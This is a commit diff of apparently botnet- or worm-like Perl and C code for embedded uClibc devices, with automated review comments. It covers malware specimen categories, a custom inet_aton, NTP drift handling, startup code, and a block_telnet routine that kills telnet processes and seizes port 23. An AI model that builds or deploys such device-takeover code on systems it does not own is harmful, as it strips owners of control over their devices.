Commit 6b78ce65 authored by The White Team's avatar The White Team

minor improvements in specimen management, ntp, uclibc startup and more

parent b2094f6f
......@@ -30,19 +30,27 @@ use bm::sql;
our @CATEGORY = qw(
unknown
malware
corruptelf
corruptupx
malware!
corruptelf!
corruptupx!
dynamic
innocent
suspicious
notelf
notelfexec
malware-manual!
innocent-manual
);
our @IS_MALWARE;
for (0 .. $#CATEGORY) {
$IS_MALWARE[$_] = 1 if $CATEGORY[$_] =~ s/!$//;
}
sub cat_is_malware($)
{
($_[0] >= 1 and $_[0] <= 3) ? 1 : 0;
$IS_MALWARE[$_[0]] ? 1 : 0;
}
sub path($$$)
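Review bot: After the loop at L24-L26 strips the trailing `!`, `malware`, `corruptelf` and `corruptupx` each appear twice in @CATEGORY (at indices 1-3 without the marker and at 4-6 with it), so only the numeric index tells them apart and any name-to-index lookup built from this array would be ambiguous; cat_is_malware also now answers 0 for indices 1-3 where the removed line at L29 answered 1. If that split is intended, the array deserves a comment, e.g. `# a trailing "!" marks a category as confirmed malware; it is stripped below and recorded in @IS_MALWARE`. The `s/!$//` would more precisely be `s/!\z//`, since `$` also matches before a trailing newline. `sub path` begins at the end of the hunk and its body is outside it.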
......
......@@ -317,6 +317,14 @@ sub connect_to($;$)
tcp_connect $ip, $port, $timeout;
}
# uClibc inet_aton is faulty, roll our own
sub inet_aton($)
{
@_ = split /\./, $_[0];
pack "N", (pop) + ($_[0] << 24) + ($_[1] << 16) + ($_[2] << 8);
}
sub id2str($)
{
(Socket::inet_ntoa substr $_[0], 0, 4) . ":" . unpack "x4n", $_[0];
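Review bot: The new inet_aton at L38-L42 does no validation of its input: a string with fewer than four dot-separated fields leaves `$_[1]`/`$_[2]` undefined (warning, treated as 0), more than four fields silently drops the middle ones, a field above 255 carries into the neighbouring octet, and anything that is not a dotted quad yields four bytes of garbage instead of the failure the replaced Socket/AnyEvent calls reported — the callers at L52, L60 and L68 pass whatever `$ip`/`$host` holds, and the NTP host at L68 in particular may well be a name rather than a literal. Validating the four octets and returning undef otherwise lets callers detect the case, and `pack "C4"` avoids the shifts; the `undef` return deliberately keeps one list element so the `pack "a4n", ...` callers stay aligned, though they still need an explicit defined check. The call `inet_aton $ip, $port` at L52 only parses as intended because of the `($)` prototype, so `(inet_aton $ip), $port` would be clearer.
```perl
# uClibc inet_aton is faulty, roll our own
# dotted-quad literals only: returns the 4 packed bytes, or undef if the
# string is not a valid IPv4 literal (callers must test defined)
sub inet_aton($)
{
    my @octet = split /\./, $_[0], -1;
    return undef unless @octet == 4
        and 4 == grep { /\A\d{1,3}\z/ and $_ <= 255 } @octet;
    pack "C4", @octet;
}
```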
......@@ -325,9 +333,7 @@ sub id2str($)
sub str2id($)
{
my ($ip, $port) = split /:/, $_[0];
# uClibc inet_aton is faulty, we currently *have* to use AnyEvent::Socket
pack "a4n", (AnyEvent::Socket::parse_address $ip), $port;
pack "a4n", inet_aton $ip, $port;
}
sub abspath($)
......
......@@ -427,7 +427,7 @@ bn::event::on port_connect_me0aX7Ew => sub {
or return;
($hello, $port) = unpack "Cn", $hello;
my $id = pack "a4n", (Socket::inet_aton $host), $port;
my $id = pack "a4n", (bn::func::inet_aton $host), $port;
if ((substr $id, 0, 4) eq bn::net::own_ipbin) {
delete $as{$id};
......
......@@ -34,10 +34,10 @@ sub get_unixtime_from($)
socket my $fh, Socket::PF_INET, Socket::SOCK_DGRAM, 0
or return;
connect $fh, Socket::sockaddr_in 123, Socket::inet_aton $host
connect $fh, Socket::sockaddr_in 123, bn::func::inet_aton $host
or return;
for (1 .. 5) {
for (1 .. 3) {
syswrite $fh, "\010" . "\0" x 47;
if (Coro::AnyEvent::readable $fh, 0.5) {
......@@ -75,7 +75,7 @@ sub ntp_diff()
if $tn > 1300000000;
}
$last_diff = @t ? (List::Util::sum @t) / @t : 0;
$last_diff = @t ? (List::Util::sum @t) / @t : undef;
}
our $next_update;
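Review bot: With L78 the value ntp_diff leaves in `$last_diff` is undef rather than 0 when no server answered, which changes the function's contract for every caller, not only update() below, which is the one taught to test `defined $ntp`; any other reader that adds or compares `$last_diff` (the function's opening and any other callers are outside the hunk) will now warn and treat it as 0. A comment at the assignment would make the new meaning explicit, e.g. `# undef (not 0) means no usable sample this round; callers must test defined`.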
......@@ -89,9 +89,10 @@ sub update();
sub update()
{
my $time = AE::now;
my $ntp = AE::now + ntp_diff;
my $ntp = ntp_diff;
if ($next_update) {
if ($next_update && defined $ntp) {
$ntp += $time;
my $diff = abs 1 - ($time - $last_time) / ($ntp - $last_ntp) * $factor;
if ($diff > $MAX_DIFF) {
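Review bot: Because `$ntp += $time` at L89 now runs only inside the `$next_update && defined $ntp` branch, on the first call (no timer yet) `$ntp` stays the bare offset returned by ntp_diff rather than the absolute time the removed `AE::now + ntp_diff` produced, and that offset is what the later `$last_ntp = $ntp` in the next hunk stores; the following call then computes `$ntp - $last_ntp` between an absolute time and an offset, so the first factor adjustment is based on a meaningless ratio. Converting right after the sample, `$ntp += $time if defined $ntp;` after L86, and keeping the guard as it is, restores the old meaning of `$last_ntp`. update() continues past the hunk.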
......@@ -104,19 +105,20 @@ sub update()
$factor = $MIN_FACTOR if $factor < $MIN_FACTOR;
$factor = $MAX_FACTOR if $factor > $MAX_FACTOR;
$bn::cfg{ntp_factor} = $factor;
bn::cfg::save;
$last_time = $time;
$last_ntp = $ntp;
}
$last_time = $time;
$last_ntp = $ntp;
$next_update = AE::timer $interval * $factor + rand 60, 0, sub {
bn::func::async {
update;
bn::log "ntp updated $factor, " . ($ntp - $time);
bn::log "ntp update $factor, $diff";
};
};
$bn::cfg{ntp_factor} = $factor;
bn::cfg::save;
}
*force = \&update;
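Review bot: The `$diff` interpolated in the new log line at L106 is not the `my $diff` declared at L90, which is scoped to the `if` block closed at L99 before the timer is set, so under `use strict` this does not compile unless an outer `$diff` exists above the hunk — and if one does, the message logs that variable, not the measured drift. Separately, L100-L101 now store `$last_ntp = $ntp` even when `$ntp` is undef (no sample), so the next successful run computes `$ntp - $last_ntp` against undef. Declaring `my $diff;` before the `if` at L87 and assigning inside it, plus guarding the bookkeeping with `if (defined $ntp) { $last_time = $time; $last_ntp = $ntp; }`, addresses both; the timer callback should then skip the log when `$diff` is undef. The start of update() is in the previous hunk.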
......
......@@ -240,11 +240,12 @@ sub block_telnet
for (1 .. 9) {
kill $sig, $find_telnet->();
if ( $PORT23_LISTENER ||= eval {
AnyEvent::Socket::tcp_server undef, 23,
sub {&$PORT23_ACCEPT}
}
) {
$PORT23_LISTENER ||= eval {
AnyEvent::Socket::tcp_server undef, 23,
sub {&$PORT23_ACCEPT}
} for 1 .. 128;
if ($PORT23_ACCEPT) {
bn::log "block_telnet success bind port 23";
return;
}
......
......@@ -22,7 +22,9 @@
# define TINY_UTIL_H
# include <inttypes.h>
# include <sys/types.h>
# include <sys/syscall.h>
# include <sys/stat.h>
# if __ARM_EABI__
# define SCN(n) ((n) & 0xfffff)
......
......@@ -22,16 +22,22 @@
// and removes constructors, unwinding, and replaces the default uClibc_main
// by a much smaller version that is sufficient for our tiny utilities
#include <unistd.h>
#include "tinyutil.h"
void __uClibc_main(int (*main) (int, char **, char **), int argc,
char **argv, void (*app_init) (void), void (*app_fini) (void), void (*rtld_fini) (void), void *stack_end)
{
__environ = &argv[argc + 1];
extern char **environ;
environ = &argv[argc + 1];
/* If the first thing after argv is the arguments * the the environment is empty. */
if ((char *)__environ == *argv)
--__environ;
if ((char *)environ == *argv)
--environ;
_exit(main(argc, argv, __environ));
_exit(main(argc, argv, environ));
}
void kill_9(void)
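Review bot: The block-scope `extern char **environ;` at L149 is unusual; the declaration belongs at file scope, or, since `<unistd.h>` is already included at L143, may be provided by that header when the feature macros expose it — worth confirming against the uClibc headers in use — which would keep the function body to its three statements. The comment at L151 has a typo and looks like a joined multi-line comment: `/* If the first thing after argv is the arguments * the the environment is empty. */` should read `/* If the first thing after argv is the arguments, the environment is empty. */`. The unused `app_init`, `app_fini`, `rtld_fini` and `stack_end` parameters are consistent with the stated intent of dropping constructors. kill_9 begins at the end of the hunk; its body is outside it.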
......